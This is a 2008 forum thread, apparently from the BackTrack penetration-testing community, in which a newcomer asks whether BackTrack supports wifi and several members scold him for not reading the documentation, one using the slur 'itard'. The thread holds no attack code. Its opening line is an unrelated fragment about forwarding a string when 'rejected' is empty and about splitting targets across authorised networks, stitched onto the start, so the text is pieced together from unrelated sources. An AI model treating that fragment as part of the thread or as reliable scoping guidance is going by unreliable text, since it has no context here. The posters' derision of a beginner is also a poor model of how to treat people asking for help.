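Only forward the string when `rejected` comes back empty; a target that spans two separately authorised networks is rejected by design and has to be entered as two targets.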

hotshot247
05-06-2008, 10:14 AM
does back track have support for wifi? sorry, i'm a noob.

theprez98
05-06-2008, 11:34 AM
> does back track have support for wifi? sorry, i'm a noob.

What does this question have to do with Fast-Track?

Have you even read the most basic documentation for BackTrack?!

shamanvirtuel
05-06-2008, 09:04 PM
> does back track have support for wifi? sorry, i'm a noob.

I can't believe my eyes !!!!!!!

first, it would be polite to say hello! or thx the crew for providing backtrack.

second, RTFM! it's obvious you haven't even taken the time to read any docs on BT, or you would know that it's the number one distro for wifi pentesting!

I was not here for a long time, and I can see that when I come back, nothing has changed. seems to have the same rate of idiotic posts & posters.....:mad:

hironez
06-15-2008, 09:28 PM
> does back track have support for wifi? sorry, i'm a noob.

Hello everybody!
I really enjoy backtrack. this is my first post. :P I have been reading a lot about this and I thank everybody that have made this dist possible, I also thank all the programmers that have made the programs. =)

Not to be mean but, Noob, noob. I often hear this as an excuse and it is OK for me! But if you use it for an excuse for such a question I don't really know if I will laugh or cry. Ok, I'm a noob too. But I take the time to read before posting any dumb questions! Read at the forum and you will discover that there are many posts about wifi there!

But anyway. I wish you good luck! ;)

archangel.amael
06-15-2008, 11:22 PM
> Hello everybody!
> I really enjoy backtrack. this is my first post. :P I have been reading a lot about this and I thank everybody that have made this dist possible, I also thank all the programmers that have made the programs. =)
>
> Not to be mean but, Noob, noob. I often hear this as an excuse and it is OK for me! But if you use it for an excuse for such a question I don't really know if I will laugh or cry. Ok, I'm a noob too. But I take the time to read before posting any dumb questions! Read at the forum and you will discover that there are many posts about wifi there!
>
> But anyway. I wish you good luck! ;)

Hironez welcome aboard! Nice to see that not everyone is a itard and can read. :D

It is however unfortunate that your first post had to be this one but, a nice one none the less.